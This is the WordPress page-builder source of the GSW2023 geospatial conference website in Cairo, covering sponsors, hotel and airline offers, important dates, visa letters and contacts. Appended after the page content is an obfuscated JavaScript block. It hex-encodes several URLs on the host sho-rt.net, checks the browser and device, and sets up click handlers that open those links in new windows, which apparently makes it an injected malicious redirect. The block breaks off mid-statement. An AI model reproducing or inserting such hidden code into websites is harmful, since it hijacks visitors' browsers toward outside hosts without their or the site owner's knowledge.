rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\r\n<a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a>\r\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\r\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\r\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\r\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span>\r\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\r\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span>\r\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\r\n\r\n<h1 style=\"text-align: center;\">Journals partner</h1>\r\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\r\n\r\n<h3></h3>\r\n&nbsp;\r\n\r\n&nbsp;\r\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\r\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]\r\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\r\n[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]\r\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\r\n[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\r\n<h5></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\r\n<h4></h4>\r\n<img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" />\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]\r\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\r\n<h4></h4>\r\n<a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a>\r\n\r\n&nbsp;\r\n<h4 style=\"text-align: center;\"></h4>\r\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is September 1, 2023</span></h5>\r\n[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\" css=\".vc_custom_1687570624975{margin-top: 140px !important;}\"][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1687570128641{margin-top: -70px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1692140427657{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\"><strong>September 3, 2023</strong></h5>\r\n<h5 style=\"text-align: center;\"><strong><span lang=\"EN-US\">Dinner and Show on </span>Nile Crystal Cruising Restaurant</strong></h5>\r\n<img class=\"wp-image-5195 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d2-1-300x300.jpg\" alt=\"\" width=\"198\" height=\"198\" />[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1687570551843{margin-top: 50px !important;}\"]\r\n<h5 style=\"text-align: center;\">September 5, 2023</h5>\r\n<h5 style=\"text-align: center;\">Dinner and Show on The Citadel of Cairo</h5>\r\n<img class=\"wp-image-5196 size-medium aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/08/d1-1-300x201.jpg\" alt=\"\" width=\"300\" height=\"201\" />[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<ul>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\r\n</li>\r\n 	<li style=\"text-align: left;\">\r\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\r\n</li>\r\n</ul>\r\n[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]\r\n<h2 style=\"text-align: center;\"></h2>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>You can generate an invitation letter automatically once you provide your information.</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span><strong><span style=\"color: #ffff00;\"><a style=\"color: #ffff00;\" href=\"https://visa.gsw2023.com/\" target=\"_blank\" rel=\"noopener\">Get Your Invitation letter</a></span></strong></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\"><strong> </strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 12pt;\"><strong>If you require specific format for the Visa Letter, please Send email with the additional information to</strong></span></h5>\r\n<h5 style=\"text-align: center;\"><span style=\"color: #ffff00;\"><strong> </strong><a style=\"color: #ffff00;\" href=\"mailto:GSW-visa@gsw2023.com\" target=\"_blank\" rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\r\n[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]\r\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\r\n[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]\r\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\r\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\r\n&nbsp;\r\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\r\n<span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\r\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\r\n[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]\r\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\r\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\r\n[/vc_column_text][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var 